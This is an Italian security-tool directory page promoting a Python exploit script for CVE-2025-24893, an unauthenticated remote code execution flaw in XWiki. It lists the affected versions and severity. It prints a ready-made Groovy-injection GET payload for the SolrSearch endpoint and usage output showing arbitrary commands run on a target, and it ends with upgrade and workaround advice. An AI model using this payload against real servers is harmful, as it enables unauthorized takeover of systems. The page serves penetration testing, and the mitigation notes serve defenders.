Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-24893 — Script di exploit Python per CVE-2025-24893, una RCE critica non autenticata in XWiki Platform. Esegue codice Groovy arbitrario tramite una richiesta RSS appositamente predisposta all'endpoint SolrSearch. Include un manuale d'uso e riferimenti per la mitigazione. | Kitploit
Strumenti/GitHubGitHub/b0ysie7e/cve-2025-24893
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneStrumento di Accesso Remoto
GitHubb0ysie7e/cve-2025-24893

CVE-2025-24893

Script di exploit Python per CVE-2025-24893, una RCE critica non autenticata in XWiki Platform. Esegue codice Groovy arbitrario tramite una richiesta RSS appositamente predisposta all'endpoint SolrSearch. Include un manuale d'uso e riferimenti per la mitigazione.

Vedi Repository
11311 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Exploit per CVE-2025-24893

CVE-2025-24893 è una vulnerabilità critica di remote code execution (RCE) non autenticata che colpisce la piattaforma XWiki.
Questa falla permette a qualsiasi utente guest di iniettare ed eseguire codice Groovy arbitrario—senza autenticazione—tramite una richiesta RSS appositamente predisposta all'endpoint SolrSearch.

Ciò ha un impatto diretto su riservatezza, integrità e disponibilità del sistema interessato.

Riepilogo

  • Versioni interessate:
    • XWiki ≥ 5.3-milestone-2 fino a < 15.10.11
    • XWiki ≥ 16.0.0-rc-1 fino a < 16.4.1
  • Punteggio CVSS v3.1: 9.8 (Critico)
    Vettore: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  • Sfruttabilità: Molto facile — è sufficiente una singola richiesta HTTP GET.

⚠️ Disclaimer:

Questo codice è strettamente destinato a soli scopi educativi e di ricerca. L'uso non autorizzato su sistemi senza esplicita autorizzazione può costituire una violazione della legge. L'autore non è responsabile per qualsiasi uso improprio o attività malevola che coinvolge questo strumento.

Prova di concetto (POC)

root@kitploit:~
GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=}}}{{async async=false}}{{groovy}}println("Hello from search text:42"){{/groovy}}{{/async}}

Manuale d'uso per lo script di exploit

Questa sezione spiega come configurare ed eseguire lo script di exploit in Python per sfruttare CVE-2025-24893.


root@kitploit:~
❯ python3 CVE-2025-24893.py
usage: CVE-2025-24893.py [-h] -u URL -c COMMAND
CVE-2025-24893.py: error: the following arguments are required: -u/--url, -c/--command
root@kitploit:~
❯ python3 CVE-2025-24893.py -u http://10.10.10.10:8080 -c 'uname -a'
[*] Sending payload to: http://10.10.10.10:8080/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7d%7d%7d%7b%7basync%20async%3dfalse%7d%7d%7b%7bgroovy%7d%7dprintln("uname -a".execute().text)%7b%7b%2fgroovy%7d%7d%7b%7b%2fasync%7d%7d

[+] Command output 'uname -a':

Linux 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC 2025 x86_64 x86_64 x86_64 GNU/Linux
                                  

Mitigazione

Aggiorna alle versioni corrette:

Per correggere la vulnerabilità, aggiorna XWiki a una delle seguenti versioni:

  • XWiki 15.10.11
  • XWiki 16.4.1
  • XWiki 16.5.0 RC1

Soluzione alternativa temporanea:

Se un aggiornamento non è immediatamente possibile, puoi applicare una correzione temporanea:

  1. Modifica il file SolrSearchMacros.xml (situato in Main.SolrSearchMacros) intorno alla riga 955.
  2. Sostituisci la logica di output per utilizzare la macro rawResponse con il tipo di contenuto impostato su application/xml.
    Usa come riferimento l'implementazione trovata in macros.vm alla riga 2824.

Riferimenti:

  • NVD - CVE-2025-24893
  • Ionix Blog
  • Miggo.io
Scarica lo strumento